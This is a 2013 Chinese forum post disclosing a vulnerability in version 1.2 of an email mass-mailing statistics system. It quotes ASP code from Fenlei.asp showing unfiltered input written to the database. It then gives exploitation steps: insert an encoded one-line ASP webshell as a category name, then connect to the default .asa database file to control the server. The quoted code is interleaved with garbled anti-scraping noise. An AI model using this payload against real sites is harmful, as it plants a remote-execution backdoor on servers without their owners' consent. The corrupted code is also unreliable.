找回密码
 立即注册
查看: 2835|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
& w3 d! Y+ z  x) W
* r8 n: y% E, R/ aIF Request.QueryString("Action")="del" Then 1 O) w. |: V3 ~5 H
ID=Request.QueryString("ID") 1 T2 }+ C4 {7 K- C
IF Countss ("tui","Fenlei",ID )<>0 then
/ \9 X$ i8 e- N% Q; W* m4 N+ k'略
# u  \, g& p3 f8 B1 EIF Request.QueryString("Action")="Add" Then
4 i# F; I/ P  z8 `6 F* G* i" GTname=Request.Form("Typename")
  X& s! o) b2 s( e7 L  _9 j5 XSet Rs=Server.CreateObject("adodb.Recordset") / ]5 q- B* F: q" E
Sql="Select * From Fenlei Order by id Desc "
6 g# p( B7 A; M2 xRs.Open Sql,Conn,1,3 " L. l' u$ o+ t, f+ v
Rs.Addnew
& f5 Y/ o- R2 {- h: iRs("Typename")=Tname
' `  r  t$ P9 I/ k'略
0 N' z' k. l, }& l/ ~Set Rs=Server.CreateObject("adodb.Recordset")
) f; I5 d# A, H- d7 _Sql="Select * From Fenlei Order by id Desc " + J' W! C+ v: u$ p) z% O
Rs.Open Sql,Conn,1,1
9 W9 V/ @+ d- I+ d% m, ^# F'略
4 N! ^: u# M4 C%>
& \  o6 `, ^3 e- G; _3 [ 3 t0 y  i. t! ]

/ {! b0 ~) v, a( H" S , ]/ D. U' Q1 E& H5 z
没有过滤,直接写入数据库。
8 O& B3 Z8 @6 b+ @8 A% `
. p! {6 q0 W4 f) D7 B& F利用方法:
- R% t, [$ ^( U2 g% r " L' r2 L- e/ V# J
插入:┼攠數畣整爠煥敵瑳∨≡┩>
. c. T$ m8 ?, i
* b- f1 Z8 y# `
- _/ Q$ b# `$ f8 _连接: http://www.xxx.com/###tongbaner.asa / v2 \; i0 n8 Q# W% j* k4 `
'默认安装文件:
+ N  \, [. O  W8 h'install.asp: p9 c, T% j; w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表